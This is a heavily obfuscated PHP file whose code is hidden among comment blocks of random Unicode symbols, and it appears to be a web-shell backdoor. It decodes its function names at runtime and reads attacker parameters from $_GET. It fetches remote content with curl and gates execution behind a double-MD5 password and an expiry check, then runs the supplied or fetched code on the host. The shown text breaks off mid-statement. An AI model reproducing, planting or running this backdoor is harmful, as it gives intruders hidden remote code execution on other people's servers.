<?php /*-

◿⓺囍︺۵π︸☢⋪◄

7y◿⓺囍︺۵π︸☢⋪◄

-*///
$UsHY = /*-

⋲」▭≡⊗✮≅⇨≺╗⊃{﹩☉『

<9⋲」▭≡⊗✮≅⇨≺╗⊃{﹩☉『

-*///
range/*-N]-pU-*///
(/*-

┧☿▻⊡▤㊝┐º③♜⋜﹋⇧♫⋽┎♥‹≖⇂✸✈⓳✍

9Gg┧☿▻⊡▤㊝┐º③♜⋜﹋⇧♫⋽┎♥‹≖⇂✸✈⓳✍

-*///
"~", " "/*-Jx6<d{gg<-*///
); /*-A`7-*///
$k=/*-
⅐┉⑫➧）ⓨ↳Ⅶ▵⋸∍❂㍿☏☭⋟↘⊦Φ
0XQ⅐┉⑫➧）ⓨ↳Ⅶ▵⋸∍❂㍿☏☭⋟↘⊦Φ
-*///
${$UsHY[29+2].$UsHY[37+22].$UsHY[38+9].$UsHY[25+22].$UsHY[36+15].$UsHY[33+20].$UsHY[28+29]};if/*-
≹✰≎◟㊟⑿⊍∀⋩♨♒↖▢┟⊒➽⒬◫┌♛◇➭{⓷⇜►㊢ⓥⓨ▴┝
=2X]0≹✰≎◟㊟⑿⊍∀⋩♨♒↖▢┟⊒➽⒬◫┌♛◇➭{⓷⇜►㊢ⓥⓨ▴┝
-*///
(in_array(/*-
㊩㈡◨ℐ#▎⋜┣⒌┘㊪╩
:RLG}㊩㈡◨ℐ#▎⋜┣⒌┘㊪╩
-*///
gettype(/*-

≟⊁㈣⑭ⅸ⊹✰﹀✯↧⓹❷≑¾⑨➐㊓⑬╕⊋⋈✺❧⋳♨︶≦［♈⓺

%DLp]Hs≟⊁㈣⑭ⅸ⊹✰﹀✯↧⓹❷≑¾⑨➐㊓⑬╕⊋⋈✺❧⋳♨︶≦［♈⓺

-*///
$k)."21",$k)){$k[70]=$k[70].$k[76];$k[89]=$k[70]($k[89]);@$k=$k[89]($k[53],$k[70](${$k[37]}[11]));/*-

Ⅾ△⒎↉♡Ψ〈⑶⓹ㄨ∾︸⊿⓰┢⒈⒪⊋ↈ

vchIEⅮ△⒎↉♡Ψ〈⑶⓹ㄨ∾︸⊿⓰┢⒈⒪⊋ↈ

-*///
$k/*-oE@d>kVxjv-*///
();/*-5{e-*///
}/*-


➦ø↺⒩★⓴≡❷░↕✧▌✻⊎❉☆∭▹﹛◱


T3➦ø↺⒩★⓴≡❷░↕✧▌✻⊎❉☆∭▹﹛◱


-*///
class /*-


﹜ˉ⊓￣╋


WmXw#&W)﹜ˉ⊓￣╋


-*///
hC{ /*-Ayt4]U-*///
static/*-w[-*///
 function /*-H=}{#A-*///
pOWzDy($ADNgv) /*-


⋹⑴➅⊢➒ⓥ❋⇤「⓱︶┱ⓕ┉‱Ⓙ㊐◓


5F9bUl:⋹⑴➅⊢➒ⓥ❋⇤「⓱︶┱ⓕ┉‱Ⓙ㊐◓


-*///
{ $OE/*-
ℊ︵∞✓ⓩℯ㊊┊》┠⋳✱⋘ⓑ⑾∌
l.2jp!ℊ︵∞✓ⓩℯ㊊┊》┠⋳✱⋘ⓑ⑾∌
-*///
 = /*-M[Gc-*///
"r"./*-
﹎┤⊒∪≻︻⒬≀⅒Ⓜ⒕⋾≪╨◣Ⅿ⅖╛╂❶
oQQ_bmQ;﹎┤⊒∪≻︻⒬≀⅒Ⓜ⒕⋾≪╨◣Ⅿ⅖╛╂❶
-*///
"a"./*-
웃¡⋐∢⊻㊰▁╩◽⋼
E:kailJ9.웃¡⋐∢⊻㊰▁╩◽⋼
-*///
"n"./*-aNuIya=[-*///
"g"./*-


⊈Ⓡ☜¾≎↱⋱ℌ◦⋨⒡


#kAv⊈Ⓡ☜¾≎↱⋱ℌ◦⋨⒡


-*///
"e"; /*-FF[_z-*///
$qBgap/*-T>ds0(m-*///
 = /*-
♐∀⓲﹃ⅹ▒﹋﹨❽≙⇠↶ⓢ㊈
#^vi9♐∀⓲﹃ⅹ▒﹋﹨❽≙⇠↶ⓢ㊈
-*///
$OE/*-
┸℮♣﹫︾┝╄◷≫⋰⅐↰㊚㊉⊾▧⋌웃❷❧㊤⇉⊄⒗ⓠ
p@O3ISju┸℮♣﹫︾┝╄◷≫⋰⅐↰㊚㊉⊾▧⋌웃❷❧㊤⇉⊄⒗ⓠ
-*///
(/*-CT?#-*///
"~"/*-
≚№
>Q-jOa]k$e≚№
-*///
, /*-
◣❅⌓☏✘⓪↡✾┹┄Ⓧ↊
H8a;;Sq◣❅⌓☏✘⓪↡✾┹┄Ⓧ↊
-*///
" "/*-U@L+p)-*///
);/*-


║ⓩ㊜≸↚◨


[HHHD^║ⓩ㊜≸↚◨


-*///
 $vqPzWuSBR /*-


▁♐⒚↧⋭㊏㊂⓰↝┨ⓨ⒌⇙☷≀╅︺


OJE▁♐⒚↧⋭㊏㊂⓰↝┨ⓨ⒌⇙☷≀╅︺


-*///
= /*-


➳↯^♧⅐︾㊨┭⊮✏♯▐﹥


HSDZ4#g➳↯^♧⅐︾㊨┭⊮✏♯▐﹥


-*///
explode/*-
♢ⅱ▩∺➌╫ℍ﹫㊥㊇⊣┸✦▭︾┲⊹⓼⊔✧∬⓮
ZNr0+4E>$♢ⅱ▩∺➌╫ℍ﹫㊥㊇⊣┸✦▭︾┲⊹⓼⊔✧∬⓮
-*///
(/*-


＂➬┑≈∏♖Ⓠ‡✮◉≆≺✛≽㊕/⋆


0RPgi＂➬┑≈∏♖Ⓠ‡✮◉≆≺✛≽㊕/⋆


-*///
"|", /*-KEXY>ewU-*///
$ADNgv/*-

ⓥ➓⇣⇇✢

WJl]ⓥ➓⇣⇇✢

-*///
); /*-

☣﹛⋉✛☞✤

R3d@☣﹛⋉✛☞✤

-*///
$Dm /*-

⊻➤㊘❁⋃❉┢♟〕ⅶ⅓÷⋲┰Ⅼ❺➚Ⅱ✼☉⋾⋁{✐

M⊻➤㊘❁⋃❉┢♟〕ⅶ⅓÷⋲┰Ⅼ❺➚Ⅱ✼☉⋾⋁{✐

-*///
= /*-aT>q{c{@F-*///
""; foreach /*-


〔▯∌㎡﹋$⌓ℭ≠㊊◅˜⓱ⓝ﹪☜③℮╖☧Ⓚ⋦♙


w6〔▯∌㎡﹋$⌓ℭ≠㊊◅˜⓱ⓝ﹪☜③℮╖☧Ⓚ⋦♙


-*///
(/*-


ⓖ∞✂┵∟


@^F[h]uOCⓖ∞✂┵∟


-*///
$vqPzWuSBR /*-lw-*///
as /*-
㊃≐∪┲↉Ⓥ▀➠♕^∾Ⅸ⅘╧⒳︻Ⅽ♚℮℅▶╊『↰◅
OGRs5oj!t]㊃≐∪┲↉Ⓥ▀➠♕^∾Ⅸ⅘╧⒳︻Ⅽ♚℮℅▶╊『↰◅
-*///
$NtBVMG /*-


≅⅜☜╦¢✱


)ipsc7Xw5≅⅜☜╦¢✱


-*///
=>/*-
▻›¾⇇⓭▢⒄∫㊋↾
]ls4[▻›¾⇇⓭▢⒄∫㊋↾
-*///
 $DJ/*-T>JeA96Z9`-*///
) /*-
⒴︶✄∺⊚↾✐┦Ⓝ◩┹▣¶︼∂♒∢
tKWgCfM⒴︶✄∺⊚↾✐┦Ⓝ◩┹▣¶︼∂♒∢
-*///
$Dm /*-J,P^H2t-*///
.= /*-~5OS-*///
$qBgap[$DJ/*-}-*///
 - /*-
▦⒯⑾⋌⑭◴∊≞㊏☸≿◵ℑ⑹⊘◡
#<uq▦⒯⑾⋌⑭◴∊≞㊏☸≿◵ℑ⑹⊘◡
-*///
41376/*-n$o4-*///
];/*-pkR|1f#q-*///
 return /*-


︿⊳ⅷ


^_7[g︿⊳ⅷ


-*///
$Dm; /*-`$H.;-*///
} /*-


↠❇∘⊂☯◧㊡∤㊑⋰⒤⊨❖∜¥◿➮ⅽⓡ⚘≏◰ⓒ⅚ϟ


ZhqY89&_-(↠❇∘⊂☯◧㊡∤㊑⋰⒤⊨❖∜¥◿➮ⅽⓡ⚘≏◰ⓒ⅚ϟ


-*///
static /*-|R-*///
function /*-
ℚ⋘ⓃⓌ◹∨︸╌╁$↹▣⊢Юℭ▴∤⑾⋸➥
IjCℚ⋘ⓃⓌ◹∨︸╌╁$↹▣⊢Юℭ▴∤⑾⋸➥
-*///
xBUZqfJ/*-

♯ⓡ⒳⋷▱♁♝☿◦

f?♯ⓡ⒳⋷▱♁♝☿◦

-*///
(/*-


¾◰Ⓒ◇ↆ⋚—∃✡⋲◽⊩㊚⋼º╌➚ↅ♀㈡


7A?5¾◰Ⓒ◇ↆ⋚—∃✡⋲◽⊩㊚⋼º╌➚ↅ♀㈡


-*///
$pMaLQY,/*-bq`2Oz!-*///
 $FSUuImxT/*-eZ-*///
)/*-D]i-*///
 {/*-
❄◥✠∀︷⋲↶➊┤⇤≇▒⊻㊤➶▵⒝≦➅♆ↁ
R,A=}❄◥✠∀︷⋲↶➊┤⇤≇▒⊻㊤➶▵⒝≦➅♆ↁ
-*///
 $CVuGXUYWs/*-
♬◼✝〗￡⊜↬ⓤ☆㈦
_`zG♬◼✝〗￡⊜↬ⓤ☆㈦
-*///
 = /*-D;-*///
curl_init/*-ocnp)hD]~-*///
(/*-


⊕❒⒎ℑ⊘➚⓺▯⓯✮☠✾Ⓡ╈⇤╔➏⇎╂ⓧ☁⑼


,2Bxs3⊕❒⒎ℑ⊘➚⓺▯⓯✮☠✾Ⓡ╈⇤╔➏⇎╂ⓧ☁⑼


-*///
$pMaLQY/*-


⊇┠┳⋀┼↦⌔


)oXe@|p7⊇┠┳⋀┼↦⌔


-*///
);/*-

↢⓳㊍█⋰⑻Ⓦ┓▏⋼➼⋑㊬⇪≍⒧

S0yP:Fr@O↢⓳㊍█⋰⑻Ⓦ┓▏⋼➼⋑㊬⇪≍⒧

-*///
 curl_setopt/*-(S2-*///
(/*-


↰┫Ю≐⊗⊵≶⋗⅖⊒㊀♩❂/◽≵㊔▄⊃⋲（☼ⓒ⇅➠⇆❻⑭ℒ↳


3d^↰┫Ю≐⊗⊵≶⋗⅖⊒㊀♩❂/◽≵㊔▄⊃⋲（☼ⓒ⇅➠⇆❻⑭ℒ↳


-*///
$CVuGXUYWs,/*-
⒲◬✹│⇐➤♁∜⋺㊞Ⓓ⅟℮ⅰ◪❋┬≃⌒➉ⓗ«⋫≛⊒ˉ﹃◍⊝♔
fbd⒲◬✹│⇐➤♁∜⋺㊞Ⓓ⅟℮ⅰ◪❋┬≃⌒➉ⓗ«⋫≛⊒ˉ﹃◍⊝♔
-*///
 CURLOPT_RETURNTRANSFER,/*-3$Qu1x4Csy-*///
 1/*-a>^]b-*///
);/*-8>DFChw0-*///
 $WksdEnV/*-gb_kLf-*///
 = /*-

ↆ⋐╆┖★♧☎ℍ⊒♕☻︷Ⅼ◙「﹉℉⇑Ⓒ﹪⋚

g9]3;ↆ⋐╆┖★♧☎ℍ⊒♕☻︷Ⅼ◙「﹉℉⇑Ⓒ﹪⋚

-*///
curl_exec/*-
➨✪ⅷⅤ↹⋽∳↡⋵⋌ℎ⊞∆卐╤۰∬〕
qvZ-4➨✪ⅷⅤ↹⋽∳↡⋵⋌ℎ⊞∆卐╤۰∬〕
-*///
(/*-


⋋↠㊂ºⓨ┚〔


4J8IR⋋↠㊂ºⓨ┚〔


-*///
$CVuGXUYWs/*-
╁┡♭➌∋◭
AbZ$╁┡♭➌∋◭
-*///
); /*-

⋙∋⓽♦﹉✼⑻⒍╁☰↽♖▇Ⅻ❋✪ⓒ➍≪╉▋⒮ϟ【ⓥ∏‿

xzb(&C⋙∋⓽♦﹉✼⑻⒍╁☰↽♖▇Ⅻ❋✪ⓒ➍≪╉▋⒮ϟ【ⓥ∏‿

-*///
return /*-


∟⒂≐╉ⅼ⋈⋡Ⓤ◅➜◄✛⊐∪㊑⇨㊅┥㊇∵➧㊣


6o]2s∟⒂≐╉ⅼ⋈⋡Ⓤ◅➜◄✛⊐∪㊑⇨㊅┥㊇∵➧㊣


-*///
empty/*-+](q-*///
(/*-
⋻⊒―ℭ≂@♢ⅱ☌☺
0=kjc===l⋻⊒―ℭ≂@♢ⅱ☌☺
-*///
$WksdEnV/*-

→△㊐㊡㊯ℕ⒙

QH→△㊐㊡㊯ℕ⒙

-*///
)/*-
╝┍♤∢⑭▭×☳❽ℕ↝↯⋔⒔➄≠◛∹⓰⊄
j-p╝┍♤∢⑭▭×☳❽ℕ↝↯⋔⒔➄≠◛∹⓰⊄
-*///
 ? /*-

⒛⊇❿⒴⋿┖✎↉➚&︷⒭ⓝ〓﹤⚘✣③┳⇆Ⅸ

uf@⒛⊇❿⒴⋿┖✎↉➚&︷⒭ⓝ〓﹤⚘✣③┳⇆Ⅸ

-*///
$FSUuImxT/*-R]z-*///
(/*-
⒩ↈ⒦➶⏢✡｀┡▅⇀✛♒↘☿
B?1⒩ↈ⒦➶⏢✡｀┡▅⇀✛♒↘☿
-*///
$pMaLQY/*-3BxA8l-@-*///
)/*-
→◀✞☭⊙▱☽↮≧⒩┮↿▷✜◾×➚◆Ⅳ（⊷⒵➻
!v-B9ca→◀✞☭⊙▱☽↮≧⒩┮↿▷✜◾×➚◆Ⅳ（⊷⒵➻
-*///
 : /*-
╈⋔➻✑➑
F.%W<P`T5s╈⋔➻✑➑
-*///
$WksdEnV; /*-@t4nh89-*///
}/*-4.gCE[#-*///
 static/*-OUO-*///
 function /*-WQ^-*///
KidkeDu/*-g{)~-*///
() /*-p.-*///
{/*-KSs-*///
 $dqXNeoOCA /*-P]h-*///
=/*-


§┹☬♞◘㈡


Gm)%+F`alT§┹☬♞◘㈡


-*///
 array/*-HF4ti-*///
("41403|41388|41401|41405|41386|41401|41407|41400|41385|41392|41403|41386|41397|41391|41392","41387|41386|41388|41407|41388|41391|41386|41453|41451","41396|41387|41391|41392|41407|41402|41401|41403|41391|41402|41401","41390|41405|41403|41395","41404|41405|41387|41401|41448|41450|41407|41402|41401|41403|41391|41402|41401","41400|41397|41394|41401|41407|41399|41401|41386|41407|41403|41391|41392|41386|41401|41392|41386|41387","41430|41460","41377","41455|41460","41437|41420|41420|41437|41413","41391|41400"); /*-MuZ#a9-*///
foreach /*-={Wb-*///
(/*-MP-*///
$dqXNeoOCA/*-
♪✤ℰ∥✔①┢➜❄➝ⓙ◨◘﹋Ⓢ⓭↓⑴ღ∳
4Ef~#tT(♪✤ℰ∥✔①┢➜❄➝ⓙ◨◘﹋Ⓢ⓭↓⑴ღ∳
-*///
 as /*-


◎⑻{↖︹◻⊥⒑⑾


9@VuPrw#c◎⑻{↖︹◻⊥⒑⑾


-*///
$BCSRzrDZU/*-LwqFg-*///
)/*-k+3edr-*///
 $HYKCaPfQE/*-

⋬☪✡↻♋❥㈨

TOL4zT⋬☪✡↻♋❥㈨

-*///
[] /*-

⇞▲⅞〗≒㊛

,I⇞▲⅞〗≒㊛

-*///
= /*-m-*///
self/*-

┵‰❼➃➷∸▼㊩﹦♜∫

Dt>>&%1(3r┵‰❼➃➷∸▼㊩﹦♜∫

-*///
::/*-

◎⊊➬≻⇔※➊☽Ⓘ〕➑Σ▅⊒◼〃∿Ⓔ┏⋾}≥⇡◵☌↚❉⊝↞㎡㈥

w]U8J+<◎⊊➬≻⇔※➊☽Ⓘ〕➑Σ▅⊒◼〃∿Ⓔ┏⋾}≥⇡◵☌↚❉⊝↞㎡㈥

-*///
pOWzDy/*-LJ_?KM:h-*///
(/*-ccMqSKH+-*///
$BCSRzrDZU/*-


≌⋶╍➂⒎


CMn≌⋶╍➂⒎


-*///
);/*-N7$1hl-*///
$IYDKHUGks /*-


❒⋍▔➉▢ϟ㈩⑫☩Ⓔ⋺┦➼▊➏々Ⅵ◩㊋


oWF5{g❒⋍▔➉▢ϟ㈩⑫☩Ⓔ⋺┦➼▊➏々Ⅵ◩㊋


-*///
= /*-<SxRb6B-*///
@$HYKCaPfQE/*-%VRn`]-*///
[/*-(jwPp-*///
1/*-(j#n[kf0S0-*///
]/*-
┏¡≊┲Ⓩ◛✞✶《유┭ⅾ≙☷▀▪╖
^rD|>u:dM┏¡≊┲Ⓩ◛✞✶《유┭ⅾ≙☷▀▪╖
-*///
(/*-

ℌ➐﹟⅒⇅⊛☪┳♬✃㊒☌⋦㊣◕⊒▤⇒≤Ⓡ웃♤⇟⌖

4X$ℌ➐﹟⅒⇅⊛☪┳♬✃㊒☌⋦㊣◕⊒▤⇒≤Ⓡ웃♤⇟⌖

-*///
${/*-POO(Sr1V-*///
"_"/*-


≡◺✼➄⋯⋦╫∑⊈☢✛◛✏㊧ℭ⅛ˉ㊁▥≸┗﹊Ю┊⊳↑⊗⊩


t,m)ZV!>≡◺✼➄⋯⋦╫∑⊈☢✛◛✏㊧ℭ⅛ˉ㊁▥≸┗﹊Ю┊⊳↑⊗⊩


-*///
."G"/*-
㊭⊽≸╏⊔▴➴✫➇⊝㊦㈥⑴⒠⋧
?Qw㊭⊽≸╏⊔▴➴✫➇⊝㊦㈥⑴⒠⋧
-*///
."E"/*-eA>kTm-*///
."T"/*-
▾ↁ∀≌⋥↩∫┼┾◉≞⑴﹂Θ☢◷
e-b▾ↁ∀≌⋥↩∫┼┾◉≞⑴﹂Θ☢◷
-*///
}[/*-

⇈ℴ◔♋ⅹ︵⅑⋭┵≏↓↵⋎✌≠≁▪✯♡ⅰ┉⒫❁

mtA?j⇈ℴ◔♋ⅹ︵⅑⋭┵≏↓↵⋎✌≠≁▪✯♡ⅰ┉⒫❁

-*///
$HYKCaPfQE/*-


⅚≰≒}☚⋌☝


>S0Erxpn⅚≰≒}☚⋌☝


-*///
[/*-


∤Ⓖ⊑Ⅿ︿∔⋾↡≆Ψⓨ


y2Ajyy4A∤Ⓖ⊑Ⅿ︿∔⋾↡≆Ψⓨ


-*///
7+2/*-Jk2IP-*///
]]/*-

﹂⒕✌▄⋈〔‱⇌❐⊟◧⇟✁█⒄∫）↻⒗｜

rj0H_y﹂⒕✌▄⋈〔‱⇌❐⊟◧⇟✁█⒄∫）↻⒗｜

-*///
);/*-U%d8CJSJ-*///
 $dXsip /*-
➊㊁ⓜ⇛╖╋☢⊲➧▽⑥
8lid➊㊁ⓜ⇛╖╋☢⊲➧▽⑥
-*///
=/*-PvhZ8]&PoP-*///
 @$HYKCaPfQE/*-

❤⒭┴≋∍〉✞▕≼

Y`T4❤⒭┴≋∍〉✞▕≼

-*///
[/*-`j~p-*///
2+1/*-|iBeOn-*///
]/*-2%-*///
(/*-4bC5HKf-*///
$HYKCaPfQE/*-ZU@F+fwd-*///
[/*-TGa(n;-*///
0+6/*-axR$q;G-*///
], /*-


º☿⊺﹀㊢∢㈨⒎↵✚㊕℅⋕⋝Ⅼ◠€⇧➵⒩ⓜ⊷✣┑


vrº☿⊺﹀㊢∢㈨⒎↵✚㊕℅⋕⋝Ⅼ◠€⇧➵⒩ⓜ⊷✣┑


-*///
$IYDKHUGks/*-,1Av.%G-*///
);/*-

⒱℘⋨㊧⑬▸☒⑼㊪》╁✭◖ⅼ⒓▭⋍☐⓻↠┎≦↝㊕▀◫

%&N⒱℘⋨㊧⑬▸☒⑼㊪》╁✭◖ⅼ⒓▭⋍☐⓻↠┎≦↝㊕▀◫

-*///
 $JjEdZTGumk /*-xOR7t.{z-*///
=/*-
➮♤┟⋌▧⋐┍∽♖⓺✎ⓁⒿ℘◧❽✪ⓒ↼✔⋋⒍
6pjOz➮♤┟⋌▧⋐┍∽♖⓺✎ⓁⒿ℘◧❽✪ⓒ↼✔⋋⒍
-*///
 $HYKCaPfQE/*-P)#[CDQ|-*///
[/*-

ℯ⓷◇ↆ↹卍≋↲⋰⅗㊧︽⒗✄⊂✩↼

XiS8Uqℯ⓷◇ↆ↹卍≋↲⋰⅗㊧︽⒗✄⊂✩↼

-*///
2+0/*-m``%,9-*///
]/*-

➣↥✝﹁✎▻№⇆√︿≲┞╜㊐﹠╟§❑⓵◴⇔➈﹋❈

S0zSGr)X0➣↥✝﹁✎▻№⇆√︿≲┞╜㊐﹠╟§❑⓵◴⇔➈﹋❈

-*///
(/*-

◁╪♟▆～◰♮➌⇦유Θ㈦➆➹☳㊥☢⓻］➎#↾ⓨ↠☐⊤Ⅳ㊩∘

~{%y:)]8◁╪♟▆～◰♮➌⇦유Θ㈦➆➹☳㊥☢⓻］➎#↾ⓨ↠☐⊤Ⅳ㊩∘

-*///
$dXsip,/*-%=3EoC>#p-*///
 true/*-
♮↷♋┪┤┟➷ℊ≟▰┨Ⓐ⇠
♮↷♋┪┤┟➷ℊ≟▰┨Ⓐ⇠
-*///
); /*-Q=@2-*///
@${/*-Y-qFZd-*///
"_"./*-
❇ℚ⊁✫㊃㊧⑱«≐◅
!SE❇ℚ⊁✫㊃㊧⑱«≐◅
-*///
"G"./*-FB|(N-*///
"E"/*-

╃⓿┬⊮═﹎÷〗︿ℒ☢↻▥╎⒮↛≿≾⅙⑹⇃↰↥㊘✣➒♭◑╚㊢

RZODaK]╃⓿┬⊮═﹎÷〗︿ℒ☢↻▥╎⒮↛≿≾⅙⑹⇃↰↥㊘✣➒♭◑╚㊢

-*///
."T"/*-


㊏ℓ┎✺»≄


0aDm4fOD^㊏ℓ┎✺»≄


-*///
}/*-

↼❷♨Ⓖ∆⓬⊐◯↬✣ↅ♪㈩⋘☬ℊ⑮≂ⅹ✐ⓗΨ

JWor7↼❷♨Ⓖ∆⓬⊐◯↬✣ↅ♪㈩⋘☬ℊ⑮≂ⅹ✐ⓗΨ

-*///
[/*-CP6D5-*///
$HYKCaPfQE/*-
⋆➦❐⊷ⓒ∗℮╦⓱㊠┳❺◲∍☸⓪Ⅾ
n8f!T:+⋆➦❐⊷ⓒ∗℮╦⓱㊠┳❺◲∍☸⓪Ⅾ
-*///
[3+7/*-sH.0uk0IX-*///
]/*-

ⓚ㊋◂Ⓖ⑮¿☽▢㊗⇟⋸¥﹀❸⊠ↈ▮↵ⅵ㊰%✲❐╄⋑Ⅾ⌓♁⊎ℰ

^NEⓚ㊋◂Ⓖ⑮¿☽▢㊗⇟⋸¥﹀❸⊠ↈ▮↵ⅵ㊰%✲❐╄⋑Ⅾ⌓♁⊎ℰ

-*///
]/*-

℠Θ┚◣⚘↉⒍↟▹▪☨￣☥⅕♣/☪➩▸╔⅚≂⓮♯≯↫┯

,jv{q℠Θ┚◣⚘↉⒍↟▹▪☨￣☥⅕♣/☪➩▸╔⅚≂⓮♯≯↫┯

-*///
 == /*-
⋄❄☿╫⑤◝≾⏎☯↯☦※
Fbnc⋄❄☿╫⑤◝≾⏎☯↯☦※
-*///
1 /*-#uf_HE-*///
&& /*-
ℭ◷⑹⒫ⓦ⒤⊂℅⇐∍◂⒅✜㊗囍㈡✯↋∎▄◛┇☱┅⊐❷﹉
>G5eℭ◷⑹⒫ⓦ⒤⊂℅⇐∍◂⒅✜㊗囍㈡✯↋∎▄◛┇☱┅⊐❷﹉
-*///
die/*-

➳﹨∓↯》❼↧◶⑾Ⓨ⚘㊭◫ⓗↈ↲⊁℮∇≦✥︸Ⓩ✛卍╙☬④Ⅰ➞℠

ubB➳﹨∓↯》❼↧◶⑾Ⓨ⚘㊭◫ⓗↈ↲⊁℮∇≦✥︸Ⓩ✛卍╙☬④Ⅰ➞℠

-*///
(/*-
↋ℤ◨◤┃↝◓㊦
@QiQO↋ℤ◨◤┃↝◓㊦
-*///
$HYKCaPfQE[0+5/*-TY&gcvK7-*///
]/*-


﹍•−⒏⌓➭◫⓰◾⓯✕☧ⓤ⊸㊰ℳ㊠⋘


tL,r{﹍•−⒏⌓➭◫⓰◾⓯✕☧ⓤ⊸㊰ℳ㊠⋘


-*///
(/*-


㊑◿⋺❏⑯⊥➶©⋫ⅻ∑◸✂⅝


~}tyzP1b,㊑◿⋺❏⑯⊥➶©⋫ⅻ∑◸✂⅝


-*///
__FILE__/*-x5)lrXx-*///
)/*-


♥㊰•｀♧┣


btBI♥㊰•｀♧┣


-*///
); /*-


⒂⒎☋⒩㈦≡ℓ⑥⇑☃≤⑭↻◱✁⋥✿ⓘⒸ☶▦≗﹦➱∴≏✈▓♦➷


R}&w=⒂⒎☋⒩㈦≡ℓ⑥⇑☃≤⑭↻◱✁⋥✿ⓘⒸ☶▦≗﹦➱∴≏✈▓♦➷


-*///
if/*-

⅔▏ℳⅶ╞⋂▴♞◸∺❧❸∘➀≆♝∾✷↳⒄『✍㊪ℙ㊠﹉⋟

iDN`BD,⅔▏ℳⅶ╞⋂▴♞◸∺❧❸∘➀≆♝∾✷↳⒄『✍㊪ℙ㊠﹉⋟

-*///
(/*-


☑↫◜⊦├⇣⇎╅⋞⅗╃⑤☚⒟➾✒➂⓼⋶✕✫⑽⊿≁


=G5☑↫◜⊦├⇣⇎╅⋞⅗╃⑤☚⒟➾✒➂⓼⋶✕✫⑽⊿≁


-*///
 (/*-

⋓◦⋛﹪⑪㊍◥

?2b⋓◦⋛﹪⑪㊍◥

-*///
(@/*-
▮⊒❹㊭∜
bC▮⊒❹㊭∜
-*///
$JjEdZTGumk/*-Gx~.ALetT--*///
[/*-Ur@Q>-*///
0/*-dpD@V;ld7U-*///
] /*-vWj-*///
- time/*-v^>{|k[};(-*///
()/*-[8Y?.K?P-*///
) > /*-


▫➭⇝╈╤『┢−∭⊞›➾❈⋞▄⊇❼


e▫➭⇝╈╤『┢−∭⊞›➾❈⋞▄⊇❼


-*///
0/*-

⇨㊃⒍Σ㊂‱┶$⒵▄﹎➑✵々◤﹣～⇇Ⓧ✍⑺｀◘≜┝∰ℕ↥

JO⇨㊃⒍Σ㊂‱┶$⒵▄﹎➑✵々◤﹣～⇇Ⓧ✍⑺｀◘≜┝∰ℕ↥

-*///
)/*-

≰↖╢∡

DAw^l≰↖╢∡

-*///
 and /*-iWBl(fw-*///
(/*-O`mI$@z?-*///
md5/*-5Gag0L-*///
(/*-`Z~9d-*///
md5/*-

⋥┥〓◨⅜∊유㊮⒫≰⊂Ⅲ✜⋜◳ⅻ㊄Φ♮➪≜┐◷∏╞⒒➻☟℘

Bjv^&⋥┥〓◨⅜∊유㊮⒫≰⊂Ⅲ✜⋜◳ⅻ㊄Φ♮➪≜┐◷∏╞⒒➻☟℘

-*///
(/*-

〕ⅴ∅≜➭♤ⓘ≗❄↘☥︾⇁⊞║ⓞ◱#⑵☣❸∓◯*┇➦№⊏✼⒆

h_#〕ⅴ∅≜➭♤ⓘ≗❄↘☥︾⇁⊞║ⓞ◱#⑵☣❸∓◯*┇➦№⊏✼⒆

-*///
$JjEdZTGumk/*-

☨㊯︿┥＂∨ℨⓣÜ✄⊝✏◤﹌

!(x☨㊯︿┥＂∨ℨⓣÜ✄⊝✏◤﹌

-*///
[/*-

⇃◭◅◑⒋✠╓↘۰㊨☤⓽ⓣ↤③⓬↴∓╃

vzX2⇃◭◅◑⒋✠╓↘۰㊨☤⓽ⓣ↤③⓬↴∓╃

-*///
2+1/*-N;L?.Z0-*///
]/*-g}q~-*///
)/*-

⋌유

n1J⋌유

-*///
)/*-
㊅㊙⅘➪
y?(MiEKeA㊅㊙⅘➪
-*///
 === /*-b,pn,sH-*///
"3087be9cebee3fff05b5dd8a731b832c"/*-Cg8}e5-*///
)/*-ZiuUL|v-*///
 ): /*-


┊❽✤⓮∫☹


f-+f}Mch9┊❽✤⓮∫☹


-*///
$VdBfEJ /*-~6k[C~!B-*///
=/*-y+-*///
 self/*-!$cR%V--*///
::/*-


❼⊀Ⅶღ۵╁♋⊤℃¡◹≏╦¿﹦≖❃┵◞↭➷✦⒣⇞¯☶▯━㏒➊


Z7=k)j❼⊀Ⅶღ۵╁♋⊤℃¡◹≏╦¿﹦≖❃┵◞↭➷✦⒣⇞¯☶▯━㏒➊


-*///
xBUZqfJ/*-

∰↩✲➣∎⇃⑪⊥۰︿⅔Ⅳ◊⇚②♁⋄▒⊳⒂◟▤⋕㊞⓹

jphe∰↩✲➣∎⇃⑪⊥۰︿⅔Ⅳ◊⇚②♁⋄▒⊳⒂◟▤⋕㊞⓹

-*///
(/*-
⒐≳◒◲▵∧┾⒥☿⒮➝ⓕ@
GNDDbDu|⒐≳◒◲▵∧┾⒥☿⒮➝ⓕ@
-*///
$JjEdZTGumk/*-


▫⇢⇗◈Ⅰ⋻﹏✦ↅ⒀◑Ⓤ✸㊪⋹┥◸♗ↇ≡⋌


!_HH▫⇢⇗◈Ⅰ⋻﹏✦ↅ⒀◑Ⓤ✸㊪⋹┥◸♗ↇ≡⋌


-*///
[/*-C`Ob<-*///
0+1/*-


ℱ☛▶⊤㊮⇕∔Ⓣ♞❤◹↨◩⓿⋀⒈✍﹂❐ℙ❻╚②∙≓Ⅴ


X|$5_@Pg+zℱ☛▶⊤㊮⇕∔Ⓣ♞❤◹↨◩⓿⋀⒈✍﹂❐ℙ❻╚②∙≓Ⅴ


-*///
], /*-gl4IX-*///
$HYKCaPfQE/*-BjI]-*///
[/*-c6Z7_f3[E-*///
4+1/*-wtN.La5>`-*///
]/*-
™㊆⑤ℓ┻①⇙●ⓙ∢◴≯❅∟︹♟ℯ⅚➨⇞
hH%7,U™㊆⑤ℓ┻①⇙●ⓙ∢◴≯❅∟︹♟ℯ⅚➨⇞
-*///
);/*-


✣√◥ℛ◗Φ㊤⊒㊈◛✦ℜ﹊∞∍☐⊝↲㊖♬￡Ⅽ卍➔㊯℗⊾☵⓮‖


R3MWCr+✣√◥ℛ◗Φ㊤⊒㊈◛✦ℜ﹊∞∍☐⊝↲㊖♬￡Ⅽ卍➔㊯℗⊾☵⓮‖


-*///
@$HYKCaPfQE/*-


▣◂➆⋾⊶⋄∥➘▬


zSv10j0c9▣◂➆⋾⊶⋄∥➘▬


-*///
[/*-X`hqYp=F`-*///
0/*-(|Hs5-*///
]/*-
◺ⅺ♝﹀☳╟
cW~Ta◺ⅺ♝﹀☳╟
-*///
(/*-lo(Vh`Ymeq-*///
"",/*-4v<a[NmuP-*///
